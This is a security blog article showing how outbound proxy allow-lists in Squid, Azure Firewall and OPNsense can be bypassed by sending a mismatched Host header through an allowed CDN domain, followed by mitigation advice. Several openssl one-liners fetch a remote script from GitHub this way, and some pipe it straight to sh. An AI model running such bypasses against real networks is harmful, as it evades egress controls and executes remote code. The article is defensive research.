HTTP Really Isn't That Simple (and by extension Neither Is Your Outbound Web Filtering, Actually)

by Michael Fincham

Oct 6 2025

This article takes a close look at what stands in the way of filtering outbound HTTP to the wider web in a restricted server environment, shows how to evade typical filtering configuration using a relative of domain fronting, and presents some ideas for ways to plug this gap.

Pentesters love to simply declare that something is possible in the abstract. “You have to encode your user’s input before you re-render it”, “make sure the system only accepts passwords with 16 characters or more”, “filter the outbound Internet connectivity of your server environment”, and so on.

Wouldn’t it be nice if we also had some ideas about how to practically implement these measures, as well? Often our assertions can hide surprising amounts of underlying complexity that make “why don’t you just…” statements hard to respond to.

Let’s pick an easy one for this blog post: filtering outbound Internet connectivity from a server environment. We want an allow-list of web resources that are allowed, and block everything else. Totally doable, right? A simple protocol, a simple requirement that basically every environment must have solved years ago?

Somewhere to start from

Easy one. We grab a little reference Squid configuration that I’ve been using for years for just this purpose. We’re going to allow deb.debian.org and nothing else:

# /etc/squid/squid.conf
http_port 3128
access_log /var/log/squid/access.log squid
cache deny all
## Allow only tunnelled HTTPS connections
acl HTTPS port 443
acl CONNECT method CONNECT
http_access deny !HTTPS
http_access deny !CONNECT
## Site access policies
acl source-internal src 192.0.2.0/24
acl sites-generic dstdomain deb.debian.org
http_access allow source-internal sites-generic
http_access deny all

Spin up the server and give it a little test to make sure it does what we want:

$ curl --proxy http://localhost:3128/ -i -s https://deb.debian.org/ | head -n 1
HTTP/1.1 200 Connection established
$ curl --proxy http://localhost:3128/ -i -s https://raw.githubusercontent.com/fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh | head -n 1
HTTP/1.1 403 Forbidden

Perfect! But… HTTP has been in the news again lately hasn’t it… To be extra sure this is all working as intended and can’t be bypassed by an attacker let’s try a few simple things that a normal HTTP client wouldn’t do by default, using OpenSSL s_client to make a direct TLS connection and piping some HTTP in from bash…

$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -proxy localhost:3128 -servername raw.githubusercontent.com -connect deb.debian.org:443 | fgrep echo | sh -x
+ echo As promised, completely safe.
As promised, completely safe.

Squid returned our harmless-shell-script.sh file instead of blocking it like before :( How did that bypass our filtering and make a request to GitHub?! Being able to access GitHub seems like a fairly serious hole in our security design here.

Let’s check what Squid thinks happened:

# tail -n3 /var/log/squid/access.log
1758253715.023 1002 127.0.0.1 TCP_TUNNEL/200 5933 CONNECT deb.debian.org:443 - HIER_DIRECT/2a04:4e42:37::644 -
1758253723.099 1 127.0.0.1 TCP_DENIED/403 3850 CONNECT github.com:443 - HIER_NONE/- text/html
1758253727.674 279 ::1 TCP_TUNNEL/200 4631 CONNECT deb.debian.org:443 - HIER_DIRECT/2a04:4e42:37::644 -

As far as Squid is concerned we are connecting to an allowed destination (deb.debian.org) and therefore everything is just fine. Why can’t Squid tell that we’re actually connecting to GitHub and not downloading a Debian package?

It’s that classic security dilemma again: multiple protocol layers, each with their own independent ideas about what part of the request to look at, and: a surprising gap in behaviour that emerges when those layers just don’t happen to align.

Where did “name-based routing” in HTTP requests come from?

To understand this situation requires understanding a bit of the complex history of the HTTP protocol, along with how HTTP and TLS behave together.

The concept of a proxy as a network element has existed since the 1980s, and the first web proxy (implemented in CERN’s httpd) debuted some time around 1993, along with NCSA Mosaic. The intervening 32 years have seen many free and open source web proxies developed and made available but Squid remains the “reference” implementation in many ways, and is still very popular.

Since 1997 the HTTP/1.1 standard required both clients and servers to support a Host header in requests. This marked a major change from previous HTTP behaviour and effectively decoupled the mapping between a particular URL (e.g. https://example.com/) and a specific IP address and TCP port. This change didn’t make it in to widespread use with HTTPS until the early 21st century – if you ever had to beg APNIC for more IPv4 addresses for “SSL certificates” in 2007 you will be familiar with this problem.

Here’s what a super basic HTTP/1.1 request might look like on the wire:

GET /cat-pictures-please HTTP/1.1
Host: example.com

The Host header here specifies the hostname of the server we want to talk to, since at this point we have almost certainly connected to an IP address that is serving multiple hostnames, and this needs to be explicitly specified to disambiguate the request.

Decoupling URLs from specific IP addresses and ports helped slow the inevitable exhaustion of IPv4 addresses, and paved the way for more flexible web application topologies. Through name-based routing content distribution networks (CDNs) could bring static assets closer to end users and reduce request latencies.

Over time, web server operators came to rely on this behaviour and re-numbering or changing the routing of web services “on the fly” became normal. DNS records for the hostname portion of web URLs became subject to change without notice. For instance, many CDN operators maintain pools of cache nodes and configure a given hostname with DNS records for just a handful of these, dynamically swapping them out as needed to deal with network conditions, hardware failure and so on.

And for us? The end to a direct mapping between IP addresses and URLs meant something important for endpoint security: web access control could no longer be carried out at the network layer and a full application layer proxy became necessary.

What does this mean for web filtering?

In order to understand how these multiple opportunities to make routing requests allowed us to bypass the proxy, let’s run through an example malicious HTTP request in detail. The routing decisions in HTTP are made in at least three places we can typically control. The major locations, in the order they are evaluated, and roughly increasing order of fiddliness to attack, are:

Before the TCP connection: the DNS lookup, for instance mapping example.com to 192.0.2.1.
Establishing the TLS session: the TLS Server Name Indication (SNI) protocol extension lets us ask the server “Please present a valid certificate for example.com on this connection”.
Inside the TLS session: once the client validates that the presented certificate is acceptable and can be trusted for the requested hostname, it adds a Host HTTP request header inside the protected TLS tunnel, just like pre-TLS HTTP worked.

In a normal HTTP client, such as curl or a web browser, the hostnames at all three steps will typically be identical. There’s nothing in the protocols themselves which enforce this consistency though, and by using a custom HTTP client (in our case assembled using bash and OpenSSL’s s_client tool, both of which are readily available on almost any Linux host you’re likely to find yourself on) we can start to make requests where we control the hostname at each step individually.

Stepping through how these routing opportunities are going to be evaluated in our scenario:

Our s_client instructs our Squid to connect to deb.debian.org on port 443. This matches an “allow” ACL in Squid, so the connection succeeds, and Squid starts proxying the traffic. ✅
Fastly, CDN provider to Debian, receives a TCP connection from our Squid. The TCP connection contains a TLS session where the handshake asks for the Server Name raw.githubusercontent.com. Fastly provides CDN service to an enormous number of websites, including GitHub, so this connection succeeds. ✅
Our s_client makes a TLS-secured HTTP request including the Host header for raw.githubusercontent.com. Fastly makes the backend request and provides the content. ✅

We selected raw.githubusercontent.com here because GitHub provides a convenient (and kinda bi-directional) communications channel for an attacker. Finding other services hosted by Fastly that can be similarly abused, or indeed just signing up for your own CDN account at any provider where this works, is left as an exercise for the attacker.

How do we fix it?

You might be thinking “can’t we make Squid look at the Server Name as well?” and… yes. Squid has a variety of options for TLS termination and inspection, and it can be configured to validate the TLS SNI hostname, provided it is compiled against OpenSSL. It is also important to note that the default GnuTLS version of Squid shipped in many distros does not support this operation, and will silently fail to filter SNI if you attempt it!

If you ensure you’ve installed your distro’s -openssl variant of the Squid package you can add some TLS inspection configuration:

ssl_bump peek all

After making this change we can still control the SNI header though and make the same malicious connection:

$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -proxy localhost:3128 -servername deb.debian.org -connect deb.debian.org:443 | fgrep echo | sh -x
+ echo As promised, completely safe.
As promised, completely safe.

So, even with TLS peek enabled we can still evade our proxy filtering in this situation (and many others). This is because even though we passed an allowed SNI hostname (deb.debian.org) to the CDN cache node, and the cache node recognised this hostname and was able to serve a valid certificate for it, our Host request header still resulted in the CDN routing the request internally and bypassing the anticipated filtering.

This is great for us because it means any filter outside of the TLS session (like Squid in our example) is incapable of determining whether this request is to an allowed destination or not.

Didn’t CDNs Fix Domain Fronting?

If you’re familiar with censorship evasion or covert operations within other peoples networks, you’ll likely remember Domain Fronting, a technique that gained popularity in the 2010s. This became more difficult when CDN providers decided they would disallow it, under pressure from various third parties in some cases.

Domain fronting typically relied on supplying the CDN cache node differing hostnames for steps (2) and (3) in our sequence above as part of a legitimate connection attempting to evade the notice of a censorship system. An outside observer who intercepted the connection to block or snoop on it could read only the unencrypted SNI value, while the end client secretly requested its real destination in step (3) only inside the secure tunnel established at step (2). This was used by projects such as Tor and Signal to evade national censorship in some countries.

Since the early 2020s some CDNs blocked, or at least claimed to block, domain fronting. Recently published independent research suggests that with the right techniques domain fronting is still relatively alive and well, and since it’s what enables the attack against local filtering I describe in this post, I’m inclined to agree. The specific instance we show here works well, and grants access to useful endpoints (like GitHub) from networks with a fairly common configuration (allowed to access Debian repositories or other GitHub services, for instance). This technique remains surprisingly viable as a method to bypass filtering HTTP proxies, even when TLS SNI inspection is enabled in the proxy.

At best, even if you only need to restrict access in your server environment to websites you know are hosted with CDNs where domain fronting is prevented… you are now at the whim of the CDN operator not to change their behaviour either inadvertently or intentionally, or the website operator to change CDNs without letting you know.

Is this actually fixable?

We’ve journeyed all the way from “HTTP is a simple protocol and can definitely be filtered at the network edge” to “can HTTP even be filtered at the network edge effectively?” and been exposed to a number of important security principles along the way:

The friction between different HTTP implementations.
Security assumptions that break down at implementation boundaries.
How "simple" protocols become complex in practice.

As is frequently the case in these blog posts: we have encountered another behavioural gap between the responsibility of different systems that exposes a potential vulnerability.

So what can we do?

Make the configuration harder to exploit - at least ensure TLS SNI inspection is enabled in your outbound web proxy. This increases the proportion of the HTTP requests that an attacker needs to be able to control to bypass your restrictions and potentially means some anti-domain-fronting circumvention will be required.
Use a higher-level proxy - for instance, if you only need to install Debian or Ubuntu package updates in your environment, consider a proxy like apt-cacher-ng that makes arbitrary HTTP requests more difficult.
Follow the principle of least privilege - carefully reduce the number of hosts in your environment that are allowed web access at all. Consider using a proxy policy to fully, or nearly fully, block all web requests for most hosts - this way if a host that isn’t expected to make an outbound connection suddenly attempts to, you can detect and alert on this as a strong indicator of malicious activity. Give an attacker plenty of opportunities to trip up and let you know they’re around :)
Avoid establishing an enterprise CA and doing full TLS interception - first of all, this means managing an entire PKI and all the associated problems, which is a new problem and much harder to get right than web filtering. Secondly, this breaks end to end security and is generally going to be a net security negative.
Where possible, restrict outbound proxy connections to only hosts on domains you control - especially when combined with a DNSSEC-aware stub resolver and pinned public keys for the domain, this can make for a very difficult to tamper with solution. You will likely need one or more higher level proxies hosted within your own environment for specific APIs and applications that must be accessed externally.

Bonus: Exploiting this issue in Azure Firewall and OPNsense

If you’re lucky enough to have a $3.034/hour Azure Firewall that supports transparent HTTP interception and FQDN matching in Application Rules, does that mean you’re safe from this filtering bypass?

$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -servername raw.githubusercontent.com -connect deb.debian.org:443 | fgrep echo
802B4631527F0000:error:0A000126:SSL routines:ssl3_read_n:unexpected eof while reading:../ssl/record/rec_layer_s3.c:322:
$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -servername deb.debian.org -connect deb.debian.org:443 | fgrep echo
echo "As promised, completely safe."

Nope. Application Rules seem to do SNI inspection (similar to enabling peek in Squid), but for CDNs where domain fronting still works (e.g. most of them) this doesn’t really help.

Similarly, in our testing the standard Squid-based URL filtering offered in OPNsense was vulnerable to the same issue.

HTTP as an evolving landscape

Like most things in the security world, periodic re-validation of security assumptions is critical when working in an evolving and changing environment. HTTP is an enormously important component of basically all modern technology, implementations constantly come and go and morph to better handle new use cases and requirements. One way to make sure our recommendations as security folk are actually possible to implement is to maintain a reference solution based on free software. This way even if the client’s vendor implementation can’t do the required thing at least you can “always deploy [insert name of open source project] in a Docker container” and get the job done. And hey, you can apply that knowledge to your own internal infrastructure as well!

There is danger in resting on our laurels and assuming that just because a particular configuration or control worked and was relevant 15 years ago that it is still relevant in today’s environments. The more we challenge ourselves to actually build reference implementations for the environments we wish to secure, the more likely we are to experience the actual day-to-day challenges our clients do, and this can only be a good thing when making relevant, informed security recommendations.

We haven’t even touched on HTTP2 and its :authority header here, or the HTTP3 protocol. Further analysis to see how these attacks can apply to other protocols is needed, and migrating to another protocol is going to give us another set of edge cases to investigate and address.

Follow us on LinkedIn

HTTP Really Isn't That Simple (and by extension Neither Is Your Outbound Web Filtering, Actually)

Recent Releases

advisories See all

articles See all